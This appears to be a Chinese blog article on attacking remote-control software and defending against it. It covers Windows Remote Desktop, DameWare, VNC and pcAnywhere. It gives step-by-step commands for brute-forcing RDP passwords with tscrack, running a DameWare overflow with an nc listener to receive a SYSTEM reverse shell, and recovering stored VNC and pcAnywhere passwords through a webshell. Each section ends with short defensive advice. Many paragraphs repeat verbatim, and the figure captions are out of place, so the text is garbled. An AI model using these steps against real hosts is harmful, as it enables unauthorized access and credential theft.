1、 Windows“远程桌面”
Windows自带的“远程桌面”具有功能强大,操作流畅的特点,是目前使用率最高的远程控制软件。而系统自带的特性很容易让其成为一个最隐蔽的后门。
远程桌面存在于Win2000/XP/2003系统中,在Win2000服务器版中,远程桌面(Win2000中的名称为“终端服务”)是自动启用的,而Win2000服务器版仍是目前最常用的服务器操作系统,远程桌面的服务端口是3389,我们通过端口扫描软件就可以找到很多开启有远程桌面的主机。
著名的“输入法漏洞”曾经造成数量庞大的服务器被入侵,而罪魁祸首就是远程桌面,由于远程桌面的登录界面存在输入法缺陷,黑客可以绕过远程桌面的登录验证,直接以系统管理员权限进入系统。当然这个数年前的漏洞如今已经很难再找到它的踪迹,网上存在此漏洞的主机也是九牛一毛。但是我们仍然能通过软件暴力破解出系统密码,登录远程桌面。
tscrack就是一款可以破解远程桌面密码的工具,这个程序本来是微软给用户使用的,用来检查远程桌面密码的强壮性,到了黑客手上就成了一款破解密码的利器。程序使用msrdp控件,可在本地虚拟远程终端连接窗口,通过密码字典进行破解, 可以指定多种参数,使用比较灵活。对于一些常用的,简单的密码可以在很短的时间内破解得出。
在破解之前,我们需要制作一款字典,将一些常用的,简单的密码制作成密码字典。当然也可以选择专业的密码字典生成工具,但缺点是生成的密码字典文件体积十分庞大。制作的密码字典文件应该保存为一行一个密码的形式,这样才能被tscrack正确地识别。
图1.制作完成的密码字典格式
图2.使用SecureRDP进行IP限制
图3.保存在注册表中的密码
图4.还原密码原文
图1.制作完成的密码字典格式
在“命令提示符”中运行tscrack,可以看到很多参数,不过我们只需要使用到其中的“w”参数就可以了,这个参数的作用是使用密码字典对远程桌面进行破解。假设目标主机的IP地址为192.168.0.2,我们只需输入命令“tscrack 192.168.0.2 -w passwords.txt”即可(passwords.txt为密码字典文件)。回车后程序就自动开始破解远程桌面的密码了。
防范之道:
在运行有远程桌面的主机上,我们可以修改其服务的运行端口。远程桌面的默认端口是3389,我们可以在注册表中将其修改为其他的端口,以迷惑黑客。不过这只能简单地隐藏服务,并且操作较为麻烦,安全性仍然较低,因此我们可以借助于专业的远程桌面防护软件。
SecureRDP是一款专业的远程桌面防护软件,可以对远程桌面客户端的IP地址,机器名,网卡MAC地址甚至登录时间等进行限制。运行SecureRDP,切换到“IP Address”,在这里可以对客户端的IP地址进行设定,点击“ADD”按钮,添加一个允许连接的IP地址,完成后点击“OK”即可,同时这个功能也可以设定为除该IP地址外不允许其它主机连接,方法是在“mode”选项中切换到“Logon disabled”。
设定该项后,客户端只能用这个设定好的IP地址进行连接,如果你使用的是ADSL宽带,通常是没有固定IP地址的,这样就可能造成无法连接远程桌面,因此使用该项功能时需要谨慎。
防范之道:
在运行有远程桌面的主机上,我们可以修改其服务的运行端口。远程桌面的默认端口是3389,我们可以在注册表中将其修改为其他的端口,以迷惑黑客。不过这只能简单地隐藏服务,并且操作较为麻烦,安全性仍然较低,因此我们可以借助于专业的远程桌面防护软件。
SecureRDP是一款专业的远程桌面防护软件,可以对远程桌面客户端的IP地址,机器名,网卡MAC地址甚至登录时间等进行限制。运行SecureRDP,切换到“IP Address”,在这里可以对客户端的IP地址进行设定,点击“ADD”按钮,添加一个允许连接的IP地址,完成后点击“OK”即可,同时这个功能也可以设定为除该IP地址外不允许其它主机连接,方法是在“mode”选项中切换到“Logon disabled”。
设定该项后,客户端只能用这个设定好的IP地址进行连接,如果你使用的是ADSL宽带,通常是没有固定IP地址的,这样就可能造成无法连接远程桌面,因此使用该项功能时需要谨慎。
图2.使用SecureRDP进行IP限制
限定客户端的机器名。切换到“Computer Name”标签,点击“ADD”按钮,输入一个计算机名即可。同样,该项功能也允许除该计算机名外不允许其它主机连接,方法同上。不过主机的计算机名是可以更改的,在使用其他计算机时,我们可以在“我的电脑”的“属性”中将计算机名更改成SecureRDP允许连接的计算机名,因此这项功能的灵活性要比前者高。
除此之外,我们还可以使用网卡MAC地址,客户端版本和连接时间这几项对远程连接进行防护,用好这几项将使远程桌面更加安全。值得注意的是,这几项功能可以同时使用,只有当客户端同时满足这几项设定的要求时才允许连接,例如当设定了客户端的IP地址和计算机名,只有这两项都符合后我们才能连接远程桌面。
除此之外,我们还可以使用网卡MAC地址,客户端版本和连接时间这几项对远程连接进行防护,用好这几项将使远程桌面更加安全。值得注意的是,这几项功能可以同时使用,只有当客户端同时满足这几项设定的要求时才允许连接,例如当设定了客户端的IP地址和计算机名,只有这两项都符合后我们才能连接远程桌面。
2、DameWare NT Utilities
不仅Windows会产生溢出漏洞,其他软件在编写过程中的疏忽同样会造成溢出漏洞,远程控制软件也不例外。著名的远程控制软件DameWare NT Utilities就因为存在溢出漏洞,成为了黑客获取主机系统权限的“钥匙”。 溢出漏洞存在于DameWare 4.9以下的版本中,通过溢出程序我们可以轻易地获取主机的系统权限。
运行端口扫描器“superscan”,扫描开放有6129端口的主机,6129是DameWare所使用的端口。找到安装有DameWare的主机后运行“命令提示符”,在“命令提示符”中使用网络工具nc监听一个本地端口,使用的命令如下“nc -vv -l -p 777”,回车后nc就开始监听本地的777端口了。
在“命令提示符”中运行DameWare的漏洞溢出程序,其使用方法如下“Target_Ip Target_Port Return_Ip Return_Port”,假设目标主机的IP地址为192.168.0.2,本机的IP地址为192.168.0.1,那么需要输入的命令为“192.168.0.2 6129 192.168.0.1 777”,回车后攻击就开始了。
如果溢出成功,目标主机会将一个具有系统权限的shell发送到本机的777端口,可以看到,在用nc监听的“命令提示符”窗口中,已经出现了目标主机的shell。
防范之道:
由于很多远程控制软件的运行都是建立在系统权限之上的,因此一旦黑客利用软件的溢出漏洞攻击得逞,所取得的权限也是系统级的,黑客可以对主机进行任意操作。因此我们应该重视远程控制软件所可能造成的溢出隐患。本例中的溢出漏洞仅存在于DameWare 4.9以下的版本中,升级软件至最新的版本就可以解决溢出问题.
不仅Windows会产生溢出漏洞,其他软件在编写过程中的疏忽同样会造成溢出漏洞,远程控制软件也不例外。著名的远程控制软件DameWare NT Utilities就因为存在溢出漏洞,成为了黑客获取主机系统权限的“钥匙”。 溢出漏洞存在于DameWare 4.9以下的版本中,通过溢出程序我们可以轻易地获取主机的系统权限。
运行端口扫描器“superscan”,扫描开放有6129端口的主机,6129是DameWare所使用的端口。找到安装有DameWare的主机后运行“命令提示符”,在“命令提示符”中使用网络工具nc监听一个本地端口,使用的命令如下“nc -vv -l -p 777”,回车后nc就开始监听本地的777端口了。
在“命令提示符”中运行DameWare的漏洞溢出程序,其使用方法如下“Target_Ip Target_Port Return_Ip Return_Port”,假设目标主机的IP地址为192.168.0.2,本机的IP地址为192.168.0.1,那么需要输入的命令为“192.168.0.2 6129 192.168.0.1 777”,回车后攻击就开始了。
如果溢出成功,目标主机会将一个具有系统权限的shell发送到本机的777端口,可以看到,在用nc监听的“命令提示符”窗口中,已经出现了目标主机的shell。
防范之道:
由于很多远程控制软件的运行都是建立在系统权限之上的,因此一旦黑客利用软件的溢出漏洞攻击得逞,所取得的权限也是系统级的,黑客可以对主机进行任意操作。因此我们应该重视远程控制软件所可能造成的溢出隐患。本例中的溢出漏洞仅存在于DameWare 4.9以下的版本中,升级软件至最新的版本就可以解决溢出问题.
3、VNC、Pcanywhere
远程控制软件的另一个安全隐患就是明文保存在本地的密码,例如VNC。管理员在VNC中设定的密码只经过简单地加密,并且存储在注册表中,黑客可以通过暴力破解获取VNC密码。如果在此之前,黑客已经获取了目标主机的一个webshell,那么破解安装在其上面的VNC密码将是一件轻而易举的事。
VNC的密码保存在注册表中“HKEY_CURRENT_USER/Software/ORL/WinVNC3/Password”键值处,直接打开可以看到简单加密过的密码。如果我们获取了一个webshell,首先可以通过webshell读取注册表中该项键值的内容,然后使用VNC的密码破解软件VNCX4将密码还原出来。在“命令提示符”运行VNCX4, 输入命令“VNCX4 -W”,然后将加密过的十六进制数据依次输入进去,每输入一个回车一次,输入完毕后就可以直接得到密码。
远程控制软件的另一个安全隐患就是明文保存在本地的密码,例如VNC。管理员在VNC中设定的密码只经过简单地加密,并且存储在注册表中,黑客可以通过暴力破解获取VNC密码。如果在此之前,黑客已经获取了目标主机的一个webshell,那么破解安装在其上面的VNC密码将是一件轻而易举的事。
VNC的密码保存在注册表中“HKEY_CURRENT_USER/Software/ORL/WinVNC3/Password”键值处,直接打开可以看到简单加密过的密码。如果我们获取了一个webshell,首先可以通过webshell读取注册表中该项键值的内容,然后使用VNC的密码破解软件VNCX4将密码还原出来。在“命令提示符”运行VNCX4, 输入命令“VNCX4 -W”,然后将加密过的十六进制数据依次输入进去,每输入一个回车一次,输入完毕后就可以直接得到密码。
图3.保存在注册表中的密码
VNCX4的原理并不是破解密码,而是还原密码,因此得到密码原文的速度极快,再复杂的密码也只需一秒即可得出。由此可见VNC密码加密的脆弱性。
图4.还原密码原文
作为著名安全公司赛门铁克推出的远程控制软件Pcanywhere,和VNC犯了同样的毛病,对外部的连接加密严格,黑客想通过远程暴力破解密码极为困难,而在本地的密码加密则差强人意,甚至还不如VNC,通过一个小软件就可以轻松得到Pcanywhere的密码。
安装完Pcanywhere后,软件会将管理密码保存在C:/Documents and Settings/All Users/Application Data/Symantec/pcAnywhere/下的一个扩展名为.cif的文件中,我们用Pcanywhere的密码查看工具PCAnywhere PassView就可以轻松看到密码。
图5.查看pcAnywhere的管理密码
安装完Pcanywhere后,软件会将管理密码保存在C:/Documents and Settings/All Users/Application Data/Symantec/pcAnywhere/下的一个扩展名为.cif的文件中,我们用Pcanywhere的密码查看工具PCAnywhere PassView就可以轻松看到密码。
图5.查看pcAnywhere的管理密码
碰巧的是,如果黑客获取了主机的一个webshell,这个webshell在权限的限制下,有很多的目录是不可以访问的,包括C:/Documents and Settings/下的绝大多数目录,而pcAnywhere的密码文件却恰好保存C:/Documents and Settings/下webshell可以访问到的文件夹中。这使得黑客只要得到一个webshell,那么这台主机就必死无疑了。
防范之道:
注意整体安全,一旦主机某一个部分被黑客攻陷,那么这种管理密码加密不严的远程控制软件很可能为黑客大开方便之门。而黑客如果使用软件远程暴力破解管理密码,则将是对黑客毅力的一种考验。目前两者还没有解决这个安全隐患的方法,不过设置好注册表和文件夹的读取权限可以作为一个临时的解决方案。
防范之道:
注意整体安全,一旦主机某一个部分被黑客攻陷,那么这种管理密码加密不严的远程控制软件很可能为黑客大开方便之门。而黑客如果使用软件远程暴力破解管理密码,则将是对黑客毅力的一种考验。目前两者还没有解决这个安全隐患的方法,不过设置好注册表和文件夹的读取权限可以作为一个临时的解决方案。
扫一扫
564
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
